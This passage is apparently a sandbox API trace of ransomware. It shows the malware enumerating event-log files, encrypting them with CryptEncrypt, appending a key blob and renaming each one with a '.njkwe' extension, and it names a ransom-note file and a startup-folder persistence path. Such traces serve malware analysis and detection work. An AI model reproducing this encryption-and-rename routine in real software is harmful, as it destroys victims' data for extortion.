[0066.058] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.058] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.058] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.058] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.058] CloseHandle (hObject=0x428) returned 1 [0066.060] GetProcessHeap () returned 0xbe0000 [0066.060] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.060] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 79 [0066.060] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Bits-Client%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-bits-client%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.061] GetProcessHeap () returned 0xbe0000 [0066.061] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.061] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8783aa15, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8783aa15, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-CodeIntegrity%4Operational.evtx", cAlternateFileName="MI03A7~1.EVT")) returned 1 [0066.061] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="Windows") returned -1 [0066.061] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.061] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.061] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="Program Files") returned -1 [0066.061] lstrcmpiW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.061] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx") returned 61 [0066.061] StrStrIW (lpFirst="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.061] lstrcmpW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.061] lstrcmpW (lpString1="Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpString2="taridd") returned -1 [0066.061] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.061] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.062] GetTickCount () returned 0x1150ea2 [0066.062] GetTickCount () returned 0x1150ea2 [0066.062] GetTickCount () returned 0x1150ea2 [0066.062] GetTickCount () returned 0x1150ea2 [0066.062] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.062] GetProcessHeap () returned 0xbe0000 [0066.062] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.062] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.070] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.280] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.280] GetProcessHeap () returned 0xbe0000 [0066.280] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.280] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.280] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.282] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.282] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.282] CloseHandle (hObject=0x428) returned 1 [0066.285] GetProcessHeap () returned 0xbe0000 [0066.285] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.285] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 81 [0066.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CodeIntegrity%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-codeintegrity%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.285] GetProcessHeap () returned 0xbe0000 [0066.286] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.286] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3c71c5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3c71c5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", cAlternateFileName="MI5CA2~1.EVT")) returned 1 [0066.286] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="Windows") returned -1 [0066.286] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.286] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.286] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="Program Files") returned -1 [0066.286] lstrcmpiW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.286] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx") returned 75 [0066.286] StrStrIW (lpFirst="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.286] lstrcmpW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.286] lstrcmpW (lpString1="Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpString2="taridd") returned -1 [0066.286] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.286] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.286] GetTickCount () returned 0x1150f7d [0066.286] GetTickCount () returned 0x1150f7d [0066.286] GetTickCount () returned 0x1150f7d [0066.286] GetTickCount () returned 0x1150f7d [0066.286] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.287] GetProcessHeap () returned 0xbe0000 [0066.287] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.287] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.301] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.302] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.302] GetProcessHeap () returned 0xbe0000 [0066.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.302] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.302] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.302] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.302] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.302] CloseHandle (hObject=0x428) returned 1 [0066.304] GetProcessHeap () returned 0xbe0000 [0066.304] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.304] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 95 [0066.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-CoreSystem-SmsRouter-Events%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-coresystem-smsrouter-events%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.305] GetProcessHeap () returned 0xbe0000 [0066.305] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.305] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50cc9231, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50cc9231, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", cAlternateFileName="MI5FD1~1.EVT")) returned 1 [0066.305] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="Windows") returned -1 [0066.305] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="$Recycle.bin") returned 1 [0066.305] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="System Volume Information") returned -1 [0066.305] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="Program Files") returned -1 [0066.306] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="Program Files (x86)") returned -1 [0066.306] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx") returned 61 [0066.306] StrStrIW (lpFirst="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpSrch=".njkwe") returned 0x0 [0066.306] lstrcmpW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.306] lstrcmpW (lpString1="Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpString2="taridd") returned -1 [0066.306] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.306] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.306] GetTickCount () returned 0x1150f9c [0066.306] GetTickCount () returned 0x1150f9c [0066.306] GetTickCount () returned 0x1150f9c [0066.306] GetTickCount () returned 0x1150f9c [0066.306] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.306] GetProcessHeap () returned 0xbe0000 [0066.306] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.306] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.308] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.308] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.308] GetProcessHeap () returned 0xbe0000 [0066.308] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.308] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.308] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.309] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.309] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.309] CloseHandle (hObject=0x428) returned 1 [0066.311] GetProcessHeap () returned 0xbe0000 [0066.311] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.311] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx_r00t_{3sXlE5}.njkwe") returned 81 [0066.311] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4backupkeysvc.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.312] GetProcessHeap () returned 0xbe0000 [0066.312] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.312] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50ca2fbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50ca2fbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", cAlternateFileName="MI8BDF~1.EVT")) returned 1 [0066.312] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="Windows") returned -1 [0066.313] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="$Recycle.bin") returned 1 [0066.313] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="System Volume Information") returned -1 [0066.313] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="Program Files") returned -1 [0066.313] lstrcmpiW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="Program Files (x86)") returned -1 [0066.313] wnsprintfW (in: pszDest=0xc263f8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx") returned 60 [0066.313] StrStrIW (lpFirst="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpSrch=".njkwe") returned 0x0 [0066.313] lstrcmpW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0066.313] lstrcmpW (lpString1="Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpString2="taridd") returned -1 [0066.313] StrCmpNW (lpStr1="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0066.313] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0066.314] GetTickCount () returned 0x1150f9c [0066.314] GetTickCount () returned 0x1150f9c [0066.314] GetTickCount () returned 0x1150f9c [0066.314] GetTickCount () returned 0x1150f9c [0066.314] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x2c, dwBufLen=0x80 | out: pbData=0x380f9b8*, pdwDataLen=0x380fa68*=0x80) returned 1 [0066.314] GetProcessHeap () returned 0xbe0000 [0066.314] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc42eb8 [0066.314] ReadFile (in: hFile=0x428, lpBuffer=0xc42eb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesRead=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.316] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0066.316] WriteFile (in: hFile=0x428, lpBuffer=0xc42eb8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc42eb8*, lpNumberOfBytesWritten=0x380fa6c*=0x2800, lpOverlapped=0x0) returned 1 [0066.316] GetProcessHeap () returned 0xbe0000 [0066.316] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc42eb8 | out: hHeap=0xbe0000) returned 1 [0066.316] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0066.316] WriteFile (in: hFile=0x428, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380fa6c*=0x300, lpOverlapped=0x0) returned 1 [0066.317] WriteFile (in: hFile=0x428, lpBuffer=0x380f9b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x380f9b8*, lpNumberOfBytesWritten=0x380fa6c*=0x80, lpOverlapped=0x0) returned 1 [0066.317] WriteFile (in: hFile=0x428, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380fa6c, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380fa6c*=0x4, lpOverlapped=0x0) returned 1 [0066.317] CloseHandle (hObject=0x428) returned 1 [0066.319] GetProcessHeap () returned 0xbe0000 [0066.319] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc27a58 [0066.319] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx_r00t_{3sXlE5}.njkwe") returned 80 [0066.319] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx_r00t_{3sXlE5}.njkwe" (normalized: "c:\\logs\\microsoft-windows-crypto-dpapi%4operational.evtx_r00t_{3sxle5}.njkwe")) returned 1 [0066.331] GetProcessHeap () returned 0xbe0000 [0066.331] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc27a58 | out: hHeap=0xbe0000) returned 1 [0066.331] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380faa8 | out: lpFindFileData=0x380faa8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c3ed420, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x8c3ed420, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x101000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", cAlternateFileName="MIAEBD~1.EVT")) returned 1 [0066.331] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="Windows") returned -1 [0066.331] lstrcmpiW (lpString1="Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider%4Admin.evtx", lpString2="$Recycle.bin") returned 1 [0066.331] 